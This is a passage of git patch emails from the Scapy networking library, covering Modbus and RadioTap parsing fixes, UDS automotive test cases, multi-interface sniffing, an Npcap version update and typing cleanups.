UDS_RDBIPR(dataIdentifier=2) / Raw(b"de")), + EcuResponse([EcuState(session=2), EcuState(security_level=6)], responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"dea2")), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x13))] + class MyTestCase2(AutomotiveTestCase): _description = "MyTestCase2" + @property def supported_responses(self): - return [] + return [EcuResponse(EcuState(session=2), responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef1")), + EcuResponse(EcuState(session=2), responses=UDS() / UDS_RDBIPR(dataIdentifier=6) / Raw(b"deadbeef2")), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_NR(negativeResponseCode=0x10, requestServiceId=0x11))] + = Create instance of stage test @@ -112,6 +123,29 @@ assert not mt.has_completed(EcuState(session=1)) assert mt.completed assert mt.has_completed(EcuState(session=1)) += Check supported responses + +tc1 = MyTestCase1() +tc2 = MyTestCase2() +tx = StagedAutomotiveTestCase([tc1, tc2]) +resps = tx.supported_responses + +assert len(resps) == 6 +assert resps[0].responses[0].service != 0x7f +assert resps[1].responses[0].service != 0x7f +assert resps[2].responses[0].service != 0x7f +assert resps[3].responses[0].service != 0x7f + +assert resps[4].responses[0].service == 0x7f +assert resps[5].responses[0].service == 0x7f + +assert resps[0].responses[0].load == b"dea2" +assert resps[1].responses[0].load == b"deadbeef1" +assert resps[2].responses[0].load == b"deadbeef2" +assert resps[3].responses[0].load == b"de" +assert resps[4].responses[0].requestServiceId == 0x13 +assert resps[5].responses[0].requestServiceId == 0x11 + = Check connector From d701581a1eea529dfbec14b49312d06300f9da61 Mon Sep 17 00:00:00 2001 From: Julien Bedel <30991560+JulienBedel@users.noreply.github.com> Date: Mon, 31 May 2021 00:52:56 +0200 Subject: [PATCH 0584/1632] Fix wrong Modbus response code / class match (#3202) (#3203) --- scapy/contrib/modbus.py | 6 +- test/contrib/modbus.uts | 180 ++++++++++++++++++++++++++++++++++++++++ 2 files changed, 183 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/modbus.py b/scapy/contrib/modbus.py index 9d96c802570..3bf8c3e0908 100644 --- a/scapy/contrib/modbus.py +++ b/scapy/contrib/modbus.py @@ -821,7 +821,7 @@ def guess_payload_class(self, payload): 0x87: ModbusPDU07ReadExceptionStatusError, 0x88: ModbusPDU08DiagnosticsError, 0x8B: ModbusPDU0BGetCommEventCounterError, - 0x0C: ModbusPDU0CGetCommEventLogError, + 0x8C: ModbusPDU0CGetCommEventLogError, 0x8F: ModbusPDU0FWriteMultipleCoilsError, 0x90: ModbusPDU10WriteMultipleRegistersError, 0x91: ModbusPDU11ReportSlaveIdError, @@ -840,8 +840,8 @@ def guess_payload_class(self, payload): 0x05: ModbusPDU05WriteSingleCoilResponse, 0x06: ModbusPDU06WriteSingleRegisterResponse, 0x07: ModbusPDU07ReadExceptionStatusResponse, - 0x88: ModbusPDU08DiagnosticsResponse, - 0x8B: ModbusPDU0BGetCommEventCounterRequest, + 0x08: ModbusPDU08DiagnosticsResponse, + 0x0B: ModbusPDU0BGetCommEventCounterResponse, 0x0C: ModbusPDU0CGetCommEventLogResponse, 0x0F: ModbusPDU0FWriteMultipleCoilsResponse, 0x10: ModbusPDU10WriteMultipleRegistersResponse, diff --git a/test/contrib/modbus.uts b/test/contrib/modbus.uts index f901576e83e..4809921a539 100644 --- a/test/contrib/modbus.uts +++ b/test/contrib/modbus.uts @@ -21,6 +21,186 @@ assert(isinstance(p.payload, ModbusPDU01ReadCoilsResponse)) p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x81\x02') assert(isinstance(p.payload, ModbusPDU01ReadCoilsError)) += MBAP Guess Payload ModbusPDU02ReadDiscreteInputsRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x02\x00\x00\x00\x01') +assert(isinstance(p.payload, ModbusPDU02ReadDiscreteInputsRequest)) += MBAP Guess Payload ModbusPDU02ReadDiscreteInputsResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x04\xff\x02\x01\x00') +assert(isinstance(p.payload, ModbusPDU02ReadDiscreteInputsResponse)) += MBAP Guess Payload ModbusPDU02ReadDiscreteInputsError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x82\x01') +assert(isinstance(p.payload, ModbusPDU02ReadDiscreteInputsError)) + += MBAP Guess Payload ModbusPDU03ReadHoldingRegistersRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x03\x00\x00\x00\x01') +assert(isinstance(p.payload, ModbusPDU03ReadHoldingRegistersRequest)) += MBAP Guess Payload ModbusPDU03ReadHoldingRegistersResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x05\xff\x03\x02\x00\x00') +assert(isinstance(p.payload, ModbusPDU03ReadHoldingRegistersResponse)) += MBAP Guess Payload ModbusPDU03ReadHoldingRegistersError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x83\x01') +assert(isinstance(p.payload, ModbusPDU03ReadHoldingRegistersError)) + += MBAP Guess Payload ModbusPDU04ReadInputRegistersRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x04\x00\x00\x00\x01') +assert(isinstance(p.payload, ModbusPDU04ReadInputRegistersRequest)) += MBAP Guess Payload ModbusPDU04ReadInputRegistersResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x05\xff\x04\x02\x00\x00') +assert(isinstance(p.payload, ModbusPDU04ReadInputRegistersResponse)) += MBAP Guess Payload ModbusPDU04ReadInputRegistersError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x84\x01') +assert(isinstance(p.payload, ModbusPDU04ReadInputRegistersError)) + += MBAP Guess Payload ModbusPDU05WriteSingleCoilRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x05\x00\x00\x00\x00') +assert(isinstance(p.payload, ModbusPDU05WriteSingleCoilRequest)) += MBAP Guess Payload ModbusPDU05WriteSingleCoilResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x05\x00\x00\x00\x00') +assert(isinstance(p.payload, ModbusPDU05WriteSingleCoilResponse)) += MBAP Guess Payload ModbusPDU05WriteSingleCoilError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x85\x01') +assert(isinstance(p.payload, ModbusPDU05WriteSingleCoilError)) + += MBAP Guess Payload ModbusPDU06WriteSingleRegisterRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x06\x00\x00\x00\x00') +assert(isinstance(p.payload, ModbusPDU06WriteSingleRegisterRequest)) += MBAP Guess Payload ModbusPDU06WriteSingleRegisterResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x06\x00\x00\x00\x00') +assert(isinstance(p.payload, ModbusPDU06WriteSingleRegisterResponse)) += MBAP Guess Payload ModbusPDU06WriteSingleRegisterError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x86\x01') +assert(isinstance(p.payload, ModbusPDU06WriteSingleRegisterError)) + += MBAP Guess Payload ModbusPDU07ReadExceptionStatusRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x02\xff\x07') +assert(isinstance(p.payload, ModbusPDU07ReadExceptionStatusRequest)) += MBAP Guess Payload ModbusPDU07ReadExceptionStatusResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x07\x00') +assert(isinstance(p.payload, ModbusPDU07ReadExceptionStatusResponse)) += MBAP Guess Payload ModbusPDU07ReadExceptionStatusError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x87\x01') +assert(isinstance(p.payload, ModbusPDU07ReadExceptionStatusError)) + += MBAP Guess Payload ModbusPDU08DiagnosticsRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x08\x00\x00\x00\x00') +assert(isinstance(p.payload, ModbusPDU08DiagnosticsRequest)) += MBAP Guess Payload ModbusPDU08DiagnosticsResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x08\x00\x00\x00\x00') +assert(isinstance(p.payload, ModbusPDU08DiagnosticsResponse)) += MBAP Guess Payload ModbusPDU08DiagnosticsError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x88\x01') +assert(isinstance(p.payload, ModbusPDU08DiagnosticsError)) + += MBAP Guess Payload ModbusPDU0BGetCommEventCounterRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x02\xff\x0b') +assert(isinstance(p.payload, ModbusPDU0BGetCommEventCounterRequest)) += MBAP Guess Payload ModbusPDU0BGetCommEventCounterResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x0b\x00\x00\xff\xff') +assert(isinstance(p.payload, ModbusPDU0BGetCommEventCounterResponse)) += MBAP Guess Payload ModbusPDU0BGetCommEventCounterError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x8b\x01') +assert(isinstance(p.payload, ModbusPDU0BGetCommEventCounterError)) + += MBAP Guess Payload ModbusPDU0CGetCommEventLogRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x02\xff\x0c') +assert(isinstance(p.payload, ModbusPDU0CGetCommEventLogRequest)) += MBAP Guess Payload ModbusPDU0CGetCommEventLogResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x02\xff\x0c') +assert(isinstance(p.payload, ModbusPDU0CGetCommEventLogResponse)) += MBAP Guess Payload ModbusPDU0CGetCommEventLogError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x8c\x01') +assert(isinstance(p.payload, ModbusPDU0CGetCommEventLogError)) + += MBAP Guess Payload ModbusPDU0FWriteMultipleCoilsRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x08\xff\x0f\x00\x00\x00\x01\x01\x00') +assert(isinstance(p.payload, ModbusPDU0FWriteMultipleCoilsRequest)) += MBAP Guess Payload ModbusPDU0FWriteMultipleCoilsResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x0f\x00\x00\x00\x01') +assert(isinstance(p.payload, ModbusPDU0FWriteMultipleCoilsResponse)) += MBAP Guess Payload ModbusPDU0FWriteMultipleCoilsError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x8f\x01') +assert(isinstance(p.payload, ModbusPDU0FWriteMultipleCoilsError)) + += MBAP Guess Payload ModbusPDU10WriteMultipleRegistersRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\t\xff\x10\x00\x00\x00\x01\x02\x00\x00') +assert(isinstance(p.payload, ModbusPDU10WriteMultipleRegistersRequest)) += MBAP Guess Payload ModbusPDU10WriteMultipleRegistersResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x10\x00\x00\x00\x01') +assert(isinstance(p.payload, ModbusPDU10WriteMultipleRegistersResponse)) += MBAP Guess Payload ModbusPDU10WriteMultipleRegistersError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x90\x01') +assert(isinstance(p.payload, ModbusPDU10WriteMultipleRegistersError)) + += MBAP Guess Payload ModbusPDU11ReportSlaveIdRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x02\xff\x11') +assert(isinstance(p.payload, ModbusPDU11ReportSlaveIdRequest)) += MBAP Guess Payload ModbusPDU11ReportSlaveIdResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x11\x00') +assert(isinstance(p.payload, ModbusPDU11ReportSlaveIdResponse)) += MBAP Guess Payload ModbusPDU11ReportSlaveIdError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x91\x01') +assert(isinstance(p.payload, ModbusPDU11ReportSlaveIdError)) + += MBAP Guess Payload ModbusPDU14ReadFileRecordRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x03\xff\x14\x00') +assert(isinstance(p.payload, ModbusPDU14ReadFileRecordRequest)) += MBAP Guess Payload ModbusPDU14ReadFileRecordResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x14\x00') +assert(isinstance(p.payload, ModbusPDU14ReadFileRecordResponse)) += MBAP Guess Payload ModbusPDU14ReadFileRecordError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x91\x01') +assert(isinstance(p.payload, ModbusPDU11ReportSlaveIdError)) + += MBAP Guess Payload ModbusPDU15WriteFileRecordRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x03\xff\x15\x00') +assert(isinstance(p.payload, ModbusPDU15WriteFileRecordRequest)) += MBAP Guess Payload ModbusPDU15WriteFileRecordResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x15\x00') +assert(isinstance(p.payload, ModbusPDU15WriteFileRecordResponse)) += MBAP Guess Payload ModbusPDU15WriteFileRecordError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x95\x01') +assert(isinstance(p.payload, ModbusPDU15WriteFileRecordError)) + += MBAP Guess Payload ModbusPDU16MaskWriteRegisterRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x08\xff\x16\x00\x00\xff\xff\x00\x00') +assert(isinstance(p.payload, ModbusPDU16MaskWriteRegisterRequest)) += MBAP Guess Payload ModbusPDU16MaskWriteRegisterResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x08\xff\x16\x00\x00\xff\xff\x00\x00') +assert(isinstance(p.payload, ModbusPDU16MaskWriteRegisterResponse)) += MBAP Guess Payload ModbusPDU16MaskWriteRegisterError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x96\x01') +assert(isinstance(p.payload, ModbusPDU16MaskWriteRegisterError)) + += MBAP Guess Payload ModbusPDU16MaskWriteRegisterRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x08\xff\x16\x00\x00\xff\xff\x00\x00') +assert(isinstance(p.payload, ModbusPDU16MaskWriteRegisterRequest)) += MBAP Guess Payload ModbusPDU16MaskWriteRegisterResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x08\xff\x16\x00\x00\xff\xff\x00\x00') +assert(isinstance(p.payload, ModbusPDU16MaskWriteRegisterResponse)) += MBAP Guess Payload ModbusPDU16MaskWriteRegisterError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x96\x01') +assert(isinstance(p.payload, ModbusPDU16MaskWriteRegisterError)) + += MBAP Guess Payload ModbusPDU17ReadWriteMultipleRegistersRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\r\xff\x17\x00\x00\x00\x01\x00\x00\x00\x01\x02\x00\x00') +assert(isinstance(p.payload, ModbusPDU17ReadWriteMultipleRegistersRequest)) += MBAP Guess Payload ModbusPDU17ReadWriteMultipleRegistersResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x05\xff\x17\x02\x00\x00') +assert(isinstance(p.payload, ModbusPDU17ReadWriteMultipleRegistersResponse)) += MBAP Guess Payload ModbusPDU17ReadWriteMultipleRegistersError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x97\x01') +assert(isinstance(p.payload, ModbusPDU17ReadWriteMultipleRegistersError)) + += MBAP Guess Payload ModbusPDU18ReadFIFOQueueRequest +p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x04\xff\x18\x00\x00') +assert(isinstance(p.payload, ModbusPDU18ReadFIFOQueueRequest)) += MBAP Guess Payload ModbusPDU18ReadFIFOQueueResponse +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x18\x00\x02\x00\x00') +assert(isinstance(p.payload, ModbusPDU18ReadFIFOQueueResponse)) += MBAP Guess Payload ModbusPDU18ReadFIFOQueueError +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x98\x01') +assert(isinstance(p.payload, ModbusPDU18ReadFIFOQueueError)) + = MBAP Guess Payload ModbusPDU2B0EReadDeviceIdentificationRequest (2 level test) p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x04\xff+\x0e\x01\x00') assert(isinstance(p.payload, ModbusPDU2B0EReadDeviceIdentificationRequest)) From 761b73e3293f6cbf10819a28701606c5c0fce7f7 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 22 Apr 2021 13:41:37 +0200 Subject: [PATCH 0585/1632] RadioTap MCS - fix padding --- scapy/layers/dot11.py | 2 +- test/scapy/layers/dot11.uts | 6 ++++++ 2 files changed, 7 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 5e89c1cf227..090e387a59f 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -398,7 +398,7 @@ class RadioTap(Packet): ConditionalField( ReversePadField( FlagsField("knownMCS", None, -8, _rt_knownmcs), - 4 + 2 ), lambda pkt: pkt.present and pkt.present.MCS), ConditionalField( diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index d7c00bd7014..2359068e92a 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -393,6 +393,12 @@ assert f.MCS_bandwidth == 0 assert f.MCS_index == 0xc assert f.A_MPDU_ref == 1428 += RadioTap MCS + +f = RadioTap(b"\x00\x00)\x00+@\x08\xa0 \x08\x00\xa0 \x08\x00\x00\xff\xc3$N\x00\x00\x00\x00\x10\x00d\x14@\x01\xc8\x00\x00\x00'\x00\n\xc8\x00\xbd\x01\x88\x02\x00\x00\x01\x00^\x02\x00\n\x04\xf0!K}\xb7\x00\r\xb9L\xfd\xd4 4$\x00\xaa\xaa\x03\x00\x00\x00\x08\x00E\x00\x05\x94\x80\xc7@\x00\x05\x11\x0c\xb4\xac\x10T\xc1\xe2\x02\x00\n\xdeU\x13\x89\x05\x80,m\x00\x00\x07?`G\xc7 \x00\x07\x02u\x00\x00\x00\x00H\x01\x00\x98\x00\x00\x00\x01\x00\x00\x13\x89\x00\x00\x05x\x00\x00\x00\x00\xff") +assert f.knownMCS == 0x27 +assert f.MCS_index == 10 + = Reassociation request f = Dot11(b' \x00:\x01@\xe3\xd6\x7f*\x00\x00\x10\x18\xa9l.@\xe3\xd6\x7f*\x00 \t1\x04\n\x00@\xe3\xd6\x7f*\x00\x00\x064.2.12\x01\x08\x82\x84\x0b\x16$0Hl!\x02\x08\x1a$\x02\x01\x0b0&\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x00\x00\x01\x00LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x112\x04\x0c\x12\x18`\x7f\x08\x01\x00\x00\x00\x00\x00\x00@\xdd\t\x00\x10\x18\x02\x00\x00\x10\x00\x00') assert Dot11EltRSN in f From a33af349c23999c29e2a2bf33273e697c2737d53 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 31 May 2021 01:03:00 +0200 Subject: [PATCH 0586/1632] Update npcap version in install script --- .config/appveyor/InstallNpcap.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.config/appveyor/InstallNpcap.ps1 b/.config/appveyor/InstallNpcap.ps1 index c2435e7d757..d3f8ff0c4f8 100644 --- a/.config/appveyor/InstallNpcap.ps1 +++ b/.config/appveyor/InstallNpcap.ps1 @@ -1,7 +1,7 @@ # Install Npcap on the machine. # Config: -$npcap_oem_file = "npcap-0.9997-oem.exe" +$npcap_oem_file = "npcap-1.31-oem.exe" # Note: because we need the /S option (silent), this script has two cases: # - The script is runned from a master build, then use the secure variable 'npcap_oem_key' which will be available From 430f8942fe086553fcd6ad1444e886a343bfd658 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 10 May 2021 12:02:32 +0200 Subject: [PATCH 0587/1632] Do not resolve the interface name globally --- doc/scapy/usage.rst | 2 ++ scapy/sendrecv.py | 16 ++++++++-------- test/regression.uts | 31 +++++++++++++++++++++++++++++-- 3 files changed, 39 insertions(+), 10 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 45266430fe1..c6cb273f62e 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -711,6 +711,8 @@ We can sniff and do passive OS fingerprinting:: The number before the OS guess is the accuracy of the guess. +.. note:: When sniffing on several interfaces (e.g. ``iface=["eth0", ...]``), you can check what interface a packet was sniffed on by using the ``sniffed_on`` attribute, as shown in one of the examples above. + Asynchronous Sniffing --------------------- diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 503c6a3b15d..f97fc4153ee 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1108,24 +1108,24 @@ def _run(self, quiet=quiet) )] = offline if not sniff_sockets or iface is not None: - iface = resolve_iface(iface or conf.iface) - if L2socket is None: - L2socket = iface.l2listen() + # The _RL2 function resolves the L2socket of an iface + _RL2 = lambda i: L2socket or resolve_iface(i).l2listen() # type: Callable[[_GlobInterfaceType], Callable[..., SuperSocket]] # noqa: E501 if isinstance(iface, list): sniff_sockets.update( - (L2socket(type=ETH_P_ALL, iface=ifname, **karg), + (_RL2(ifname)(type=ETH_P_ALL, iface=ifname, **karg), ifname) for ifname in iface ) elif isinstance(iface, dict): sniff_sockets.update( - (L2socket(type=ETH_P_ALL, iface=ifname, **karg), + (_RL2(ifname)(type=ETH_P_ALL, iface=ifname, **karg), iflabel) for ifname, iflabel in six.iteritems(iface) ) else: - sniff_sockets[L2socket(type=ETH_P_ALL, iface=iface, - **karg)] = iface + iface = iface or conf.iface + sniff_sockets[_RL2(iface)(type=ETH_P_ALL, iface=iface, + **karg)] = iface # Get select information from the sockets _main_socket = next(iter(sniff_sockets)) @@ -1248,7 +1248,7 @@ def stop(self, join=True): return self.results return None else: - raise Scapy_Exception("Not started !") + raise Scapy_Exception("Not running ! (check .running attr)") def join(self, *args, **kwargs): # type: (*Any, **Any) -> None diff --git a/test/regression.uts b/test/regression.uts index 38644b7d759..972af2f8cd7 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1379,9 +1379,36 @@ def _test(): assert (ans.time - req.sent_time) >= 0 assert (ans.time - req.sent_time) <= 1e-3 -retry_test(_test) +try: + retry_test(_test) +finally: + conf.L3socket = sock + += Test sniffing on multiple sockets +~ netaccess needs_root sniff + +# This test sniffs on the same interface twice at the same time, to +# simulate sniffing on multiple interfaces. + +iface = conf.route.route("www.google.com")[0] +port = int(RandShort()) +pkt = IP(dst="www.google.com")/TCP(sport=port, dport=80, flags="S") + +def cb(): + sr1(pkt, timeout=3) + +sniffer = AsyncSniffer(started_callback=cb, + iface=[iface, iface], + lfilter=lambda x: TCP in x and x[TCP].dport == port, + prn=lambda x: x.summary(), + count=2) +sniffer.start() +sniffer.join(timeout=3) + +assert len(sniffer.results) == 2 -conf.L3socket = sock +for pkt in sniffer.results: + assert pkt.sniffed_on == iface = Sending a TCP syn 'forever' at layer 2 and layer 3 ~ netaccess IP From 0d7b970af5c15e079cec86ab370aacb7e43950d3 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 1 Jun 2021 02:20:18 +0200 Subject: [PATCH 0588/1632] Scapy supports python 3.9 --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 475ea440a0c..fcbc98b3f13 100644 --- a/README.md +++ b/README.md @@ -31,7 +31,7 @@ handle, like sending invalid frames, injecting your own 802.11 frames, combining techniques (VLAN hopping+ARP cache poisoning, VoIP decoding on WEP protected channel, ...), etc. -Scapy supports Python 2.7 and Python 3 (3.4 to 3.8). It's intended to +Scapy supports Python 2.7 and Python 3 (3.4 to 3.9). It's intended to be cross platform, and runs on many different platforms (Linux, OSX, \*BSD, and Windows). From 40ac9a841581644a783f9c8ea52b8875e8087142 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 1 Jun 2021 21:45:07 +0200 Subject: [PATCH 0589/1632] Minor cleanups (contrib, typing) (#3227) * Various tests cleanup * UTscapy requires windows --- scapy/base_classes.py | 10 +++---- scapy/contrib/homeplugav.py | 21 ++++++++------- scapy/contrib/loraphy2wan.py | 10 ++++--- scapy/contrib/pnio_dcp.py | 51 ++++++++++++++++++++++++------------ scapy/contrib/vqp.py | 47 +++++++++++++++++---------------- scapy/tools/UTscapy.py | 3 +++ test/contrib/isotp.uts | 2 ++ test/contrib/isotpscan.uts | 2 ++ test/contrib/vqp.uts | 21 +++++++++++++++ 9 files changed, 109 insertions(+), 58 deletions(-) create mode 100644 test/contrib/vqp.uts diff --git a/scapy/base_classes.py b/scapy/base_classes.py index ec532110a78..623324727b6 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -291,8 +291,8 @@ def __new__(cls, # type: ignore ): # type: (...) -> Type['scapy.packet.Packet'] if "fields_desc" in dct: # perform resolution of references to other packets # noqa: E501 - current_fld = dct["fields_desc"] # type: List[Union['scapy.fields.Field'[Any, Any], Packet_metaclass]] # noqa: E501 - resolved_fld = [] # type: List['scapy.fields.Field'[Any, Any]] + current_fld = dct["fields_desc"] # type: List[Union[scapy.fields.Field[Any, Any], Packet_metaclass]] # noqa: E501 + resolved_fld = [] # type: List[scapy.fields.Field[Any, Any]] for fld_or_pkt in current_fld: if isinstance(fld_or_pkt, Packet_metaclass): # reference to another fields_desc @@ -308,7 +308,7 @@ def __new__(cls, # type: ignore break if resolved_fld: # perform default value replacements - final_fld = [] # type: List['scapy.fields.Field'[Any, Any]] + final_fld = [] # type: List[scapy.fields.Field[Any, Any]] names = [] for f in resolved_fld: if f.name in names: @@ -361,7 +361,7 @@ def __new__(cls, # type: ignore return newcls def __getattr__(self, attr): - # type: (str) -> 'scapy.fields.Field'[Any, Any] + # type: (str) -> scapy.fields.Field[Any, Any] for k in self.fields_desc: # type: ignore if k.name == attr: return k # type: ignore @@ -398,7 +398,7 @@ def __new__(cls, # type: ignore bases, # type: Tuple[type, ...] dct # type: Dict[str, Any] ): - # type: (...) -> Type['scapy.fields.Field'[Any, Any]] + # type: (...) -> Type[scapy.fields.Field[Any, Any]] dct.setdefault("__slots__", []) newcls = super(Field_metaclass, cls).__new__(cls, name, bases, dct) return newcls diff --git a/scapy/contrib/homeplugav.py b/scapy/contrib/homeplugav.py index 171eb7d0215..dba1848ddf1 100644 --- a/scapy/contrib/homeplugav.py +++ b/scapy/contrib/homeplugav.py @@ -15,6 +15,15 @@ # scapy.contrib.description = HomePlugAV Layer # scapy.contrib.status = loads +""" +HomePlugAV Layer for Scapy + +Copyright (C) FlUxIuS (Sebastien Dudek) + +HomePlugAV Management Message Type +Key (type value) : Description +""" + from __future__ import absolute_import import struct @@ -46,14 +55,6 @@ from scapy.layers.l2 import Ether from scapy.modules.six.moves import range -""" - Copyright (C) HomePlugAV Layer for Scapy by FlUxIuS (Sebastien Dudek) -""" - -""" - HomePlugAV Management Message Type - Key (type value) : Description -""" HPAVTypeList = {0xA000: "'Get Device/sw version Request'", 0xA001: "'Get Device/sw version Confirmation'", 0xA008: "'Read MAC Memory Request'", @@ -703,7 +704,7 @@ class AutoConnection(Packet): XByteField("ConnCoQoSPrio", 0x00), ShortField("ConnRate", 0), LEIntField("ConnTTL", 0), - ShortField("CSPECversion", 0), + ShortField("version", 0), StrFixedLenField("VlanTag", b"\x00" * 4, 4), @@ -1199,7 +1200,7 @@ class ModulePIB(Packet): lambda pkt:(0x1FBC >= pkt.__offset and 0x1FBD <= pkt.__offset + pkt.__length)), # noqa: E501 ConditionalField(XByteField("OptimizationBackwardCompatible", 0), lambda pkt:(0x1FBD >= pkt.__offset and 0x1FBE <= pkt.__offset + pkt.__length)), # noqa: E501 - ConditionalField(XByteField("reserved_21", 0), + ConditionalField(XByteField("reserved_21b", 0), lambda pkt:(0x1FBE >= pkt.__offset and 0x1FBF <= pkt.__offset + pkt.__length)), # noqa: E501 ConditionalField(XByteField("MaxPbsPerSymbol", 0), lambda pkt:(0x1FBF >= pkt.__offset and 0x1FC0 <= pkt.__offset + pkt.__length)), # noqa: E501 diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 313f433dc78..a1a75bb659d 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -16,9 +16,11 @@ # scapy.contrib.status = loads """ - Copyright (C) 2020 Sebastien Dudek (@FlUxIuS) - initially developed @PentHertz - and improved at @Trend Micro +Copyright (C) 2020 Sebastien Dudek (@FlUxIuS) +initially developed @PentHertz +and improved at @Trend Micro + +Spec: lorawantm_specification v1.1 """ from scapy.packet import Packet @@ -365,7 +367,7 @@ class ForceRejoinReq(Packet): fields_desc = [BitField("RFU", 0, 2), BitField("Period", 0, 3), BitField("Max_Retries", 0, 3), - BitField("RFU", 0, 1), + BitField("RFU2", 0, 1), BitField("RejoinType", 0, 3), BitField("DR", 0, 4)] diff --git a/scapy/contrib/pnio_dcp.py b/scapy/contrib/pnio_dcp.py index 2ea3c6cec84..e5ec6801a55 100644 --- a/scapy/contrib/pnio_dcp.py +++ b/scapy/contrib/pnio_dcp.py @@ -21,10 +21,24 @@ from scapy.compat import orb from scapy.all import Packet, bind_layers, Padding -from scapy.fields import ByteEnumField, ShortField, XShortField, \ - ShortEnumField, FieldLenField, XByteField, XIntField, MultiEnumField, \ - IPField, MACField, StrLenField, PacketListField, PadField, \ - ConditionalField, LenField +from scapy.fields import ( + ByteEnumField, + ConditionalField, + FieldLenField, + IPField, + LenField, + MACField, + MultiEnumField, + MultipleTypeField, + PacketListField, + PadField, + ShortEnumField, + ShortField, + StrLenField, + XByteField, 